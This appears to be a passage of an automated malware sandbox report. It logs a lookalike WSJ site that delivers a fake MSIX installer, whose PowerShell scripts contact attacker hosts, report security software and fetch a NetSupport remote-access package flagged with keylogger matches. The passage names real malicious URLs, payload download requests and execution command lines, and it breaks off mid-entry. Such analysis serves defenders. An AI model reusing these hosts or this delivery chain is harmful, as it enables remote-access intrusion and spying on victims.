                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-25 14:59:12 UTC | 215 | IN | HTTP/1.1 302 Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:11 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Location: https://cdn40.click/files/WSJ.msix
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.17 | 49797 | 23.133.88.190 | 443 | 7788 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:59:36 UTC | 400 | OUT | GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1
                                                                                                                User-Agent: myUserAgentHere
                                                                                                                Host: cdn40.click
                                                                                                                Connection: Keep-Alive
2024-04-25 14:59:37 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:59:37 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"718-/ZXthgoVdoy5VFHqHSmSrGEbAlc"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.17 | 49798 | 86.104.72.157 | 443 | 7788 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:59:38 UTC | 238 | OUT | GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1
                                                                                                                User-Agent: myUserAgentHere
                                                                                                                Host: cdn37.space
                                                                                                                Connection: Keep-Alive
2024-04-25 14:59:39 UTC | 254 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:59:39 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 42
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"2a-VXbnLaPf6Han7xE4R01i7jGMbpw"
2024-04-25 14:59:39 UTC | 42 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 63 64 6e 33 37 2e 73 70 61 63 65 2f 66 69 6c 65 73 2f 6e 65 74 73 75 70 70 6f 72 74 32 35 2e 7a 69 70
                                                                                                                Data Ascii: https://cdn37.space/files/netsupport25.zip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.17 | 49799 | 86.104.72.157 | 443 | 7788 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:59:39 UTC | 59 | OUT | GET /files/netsupport25.zip HTTP/1.1
                                                                                                                Host: cdn37.space
2024-04-25 14:59:39 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:59:39 GMT
                                                                                                                Content-Type: application/zip
                                                                                                                Content-Length: 2254634
                                                                                                                Last-Modified: Fri, 12 Apr 2024 14:59:37 GMT
                                                                                                                Connection: close
                                                                                                                ETag: "66194c59-22672a"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Data Ascii: _B%\[z#mx:jS_M_20x#^RA\z1+:KY}ks |pimPu4|f*m(s+.uJ@tMCjr`4i"3(,el1W{*n='n{JsUzx{#mRW}>o
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: f6 42 56 57 19 2b 3c 82 81 1d 09 b4 86 10 a5 64 93 7b 94 a8 53 d3 11 06 5c 3e 65 1d e6 a7 90 3f a0 84 30 66 6a 84 4c e5 bf 13 ec b3 10 0a 92 a0 51 9e 0e d5 2f 70 87 1e 33 0b de 1d d9 7b 8e 88 fd b5 40 40 47 c2 aa 11 21 2b 0d f0 c6 b3 01 ab 28 a0 eb 1c c0 e9 51 40 55 6a ab 83 c2 f1 e7 c0 e9 a3 70 f2 f7 ea 97 91 ef 22 2a c0 40 10 5f 71 8c 1e de 9c 2d 04 36 ba 1d 88 fe 9c 56 88 e4 f5 74 4c 5e 9f 7f f2 a3 79 91 67 ce fe d6 b3 f2 a8 8c c9 e3 89 9f c8 63 f5 d9 cd 70 56 1e e7 c7 e4 51 fe 13 79 bc 78 76 13 45 36 81 4a 49 f2 46 3c f3 53 c3 4a 3b f4 8d 98 e5 d6 9a 28 c5 8c 72 75 5f 2a 23 25 00 0e 19 5d 02 cd e4 26 3e 26 13 f2 fc c6 68 72 dc 97 f2 25 95 8a de 24 3b d9 26 c0 32 d1 55 3e d9 5b 9e 1f 4d 1d 1b 2f 44 e3 d1 63 ca 8f 00 2c 13 b0 14 d4 bf e3 9e f4 c9 3e 6a
                                                                                                                Data Ascii: BVW+<d{S\>e?0fjLQ/p3{@@G!+(Q@Ujp"*@_q-6VtL^ygcpVQyxvE6JIF<SJ;(ru_*#%]&>&hr%$;&2U>[M/Dc,>j
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 4f 2d 16 66 56 eb 3d 85 ac 1d ab d2 31 40 2b 0e 9d 5d 46 52 ef 03 96 30 2d 12 f3 52 4c cc bf e5 11 ea e3 0b 42 a9 0f b5 62 b9 89 51 c2 c3 c6 8a 3d 48 30 c7 75 fa cb e4 0a 93 43 ce d6 54 ea 13 1a 1b 58 9d 00 28 80 92 94 5c 33 f6 17 25 32 b9 66 af c6 ff 53 d7 02 ea 10 e5 dc dd 38 31 61 98 72 ee 4f e8 4e a4 36 54 cf 53 87 ea 18 3a 54 39 f7 3e 0a 05 4b f9 14 72 a2 0d 11 24 8e 79 e0 c0 ff 80 43 ff 9f 6d 11 62 44 c5 42 c8 0b eb 1a a5 ba 3e 79 ae 54 d1 eb 59 c1 84 a6 c8 06 a5 36 5d 02 02 1d 9d bf 92 c7 fb a2 e8 79 a9 e8 47 6c f4 59 a8 8a fc a6 2d 4a 9f a2 11 f6 0a 94 6e 00 68 c0 10 0e 22 a8 ed 19 2a 56 29 e4 d9 74 62 65 ff c4 c4 4a a3 35 3d 8f d8 46 6a 4a 6d c7 8f 25 96 b6 18 32 64 c4 9f 83 58 97 a6 43 a3 e4 69 65 d4 34 38 ab 16 26 d6 65 a0 56 97 60 70 84 0c 8a
                                                                                                                Data Ascii: O-fV=1@+]FR0-RLBbQ=H0uCTX(\3%2fS81arON6TS:T9>Kr$yCmbDB>yTY6]yGlY-Jnh"*V)tbeJ5=FjJm%2dXCie48&eV`p
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 50 4a f1 4c df 97 13 4c 7c 24 76 a9 0f 1d 5b f9 57 1b c5 6a db a6 5d d0 07 f7 81 8e 79 ba 65 a5 d2 52 dd ba 65 a9 15 97 e7 6a ca 4c ec d7 c5 93 7c c5 a9 da a0 05 ab 3d 27 b6 d9 e2 da 0d cb a6 d8 2b d8 9c 5f 6b ef f9 6f aa 95 08 30 5d 03 c8 93 71 d7 6f c0 59 9b 68 30 a4 ab 0f 4f d2 6f 23 48 f8 06 62 5f 6b 05 fb b5 8d cf 23 83 a7 b4 88 30 b8 44 46 e4 a3 22 dd 2b ff 40 4d b9 17 74 fa 3e dd ef 6c 0d 74 b3 1a b1 61 0d 64 88 f7 82 4d ee de e4 f5 c1 08 87 c5 15 59 dd c1 74 7f c1 6f 0b 73 63 1e 8e a9 6f f9 2c 98 e0 2f d8 0d 61 73 7d 4b 9f b0 ab c5 dc ed 97 3a f7 37 26 78 f6 81 6e 6f 5b 0d 89 1a 13 0a eb fb 0a 36 c6 d4 f7 fd 60 93 b5 3e 70 7b 7d df f8 87 cd f9 41 a6 8f 9a 1b c3 a3 26 b9 1b 67 4f 95 41 fb 7f aa 74 92 b3 1b a5 d7 b5 c1 ef f0 38 f9 bc a3 e7 d0 c4 e6
                                                                                                                Data Ascii: PJLL|$v[Wj]yeRejL|='+_ko0]qoYh0Oo#Hb_k#0DF"+@Mt>ltadMYtosco,/as}K:7&xno[6`>p{}A&gOAt8


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.17 | 49807 | 23.133.88.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-25 15:00:22 UTC | 400 | OUT | GET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1
User-Agent: myUserAgentHere
Host: cdn40.click
Connection: Keep-Alive
2024-04-25 15:00:23 UTC | 252 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 25 Apr 2024 15:00:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
X-Powered-By: Express
access-control-allow-origin: *
ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.17 | 49808 | 23.133.88.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-25 15:00:23 UTC | 291 | OUT | GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1
Host: cdn40.click
2024-04-25 15:00:23 UTC | 254 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 25 Apr 2024 15:00:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 19
Connection: close
X-Powered-By: Express
access-control-allow-origin: *
ETag: W/"13-jDxDK+kEkje1SmDe0R3taK+STxw"
2024-04-25 15:00:23 UTC | 19 | IN | Data Raw: 77 72 69 74 65 20 69 6e 73 74 61 6c 6c 20 65 72 72 6f 72
Data Ascii: write install error


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.17 | 49809 | 23.133.88.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-25 15:00:23 UTC | 194 | OUT | GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1
Host: cdn40.click
2024-04-25 15:00:24 UTC | 252 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 25 Apr 2024 15:00:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
X-Powered-By: Express
access-control-allow-origin: *
ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.17 | 49810 | 23.133.88.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-04-25 15:00:24 UTC | 291 | OUT | GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1
Host: cdn40.click
2024-04-25 15:00:25 UTC | 254 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 25 Apr 2024 15:00:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 19
Connection: close
X-Powered-By: Express
access-control-allow-origin: *
ETag: W/"13-jDxDK+kEkje1SmDe0R3taK+STxw"
2024-04-25 15:00:25 UTC | 19 | IN | Data Raw: 77 72 69 74 65 20 69 6e 73 74 61 6c 6c 20 65 72 72 6f 72
Data Ascii: write install error



                                                                                                                Target ID:0
                                                                                                                Start time:16:58:14
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:1
                                                                                                                Start time:16:58:14
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:14
                                                                                                                Start time:16:59:16
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                                                                                                Imagebase:0x7ff6f1be0000
                                                                                                                File size:2'483'712 bytes
                                                                                                                MD5 hash:A313FDADDB051A471645685386471EE2
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:16:59:17
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                                                                                                Imagebase:0x7ff72f0d0000
                                                                                                                File size:293'376 bytes
                                                                                                                MD5 hash:2FEB69B26AB8966F050BA56641E8438A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:20
                                                                                                                Start time:16:59:24
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
                                                                                                                Imagebase:0x7ff6c3640000
                                                                                                                File size:379'312 bytes
                                                                                                                MD5 hash:C55F8E39801444DEBA32F5B94B5F1EB8
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:16:59:25
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"PsfRunDll64.exe"
                                                                                                                Imagebase:0x7ff695d40000
                                                                                                                File size:118'704 bytes
                                                                                                                MD5 hash:8466F69926A22670DCF6515A4FC3C054
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:23
                                                                                                                Start time:16:59:25
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:24
                                                                                                                Start time:16:59:25
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff772470000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:25
                                                                                                                Start time:16:59:28
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:16:59:31
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:27
                                                                                                                Start time:16:59:31
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff772470000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:28
                                                                                                                Start time:16:59:32
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:29
                                                                                                                Start time:16:59:32
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:32
                                                                                                                Start time:16:59:44
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\ProgramData\netsupport\client\client32.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\ProgramData\netsupport\client\client32.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:55'456 bytes
                                                                                                                MD5 hash:9497AECE91E1CCC495CA26AE284600B9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2526275885.0000000002700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2487651963.0000000000602000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2496684032.0000000000827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\client32.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                • Detection: 0%, Virustotal, Browse
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:35
                                                                                                                Start time:16:59:57
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                Imagebase:0x7ff64d050000
                                                                                                                File size:71'680 bytes
                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:36
                                                                                                                Start time:16:59:59
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                                                                                                Imagebase:0x7ff6f1be0000
                                                                                                                File size:2'483'712 bytes
                                                                                                                MD5 hash:A313FDADDB051A471645685386471EE2
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:38
                                                                                                                Start time:16:59:59
                                                                                                                Start date:25/04/2024
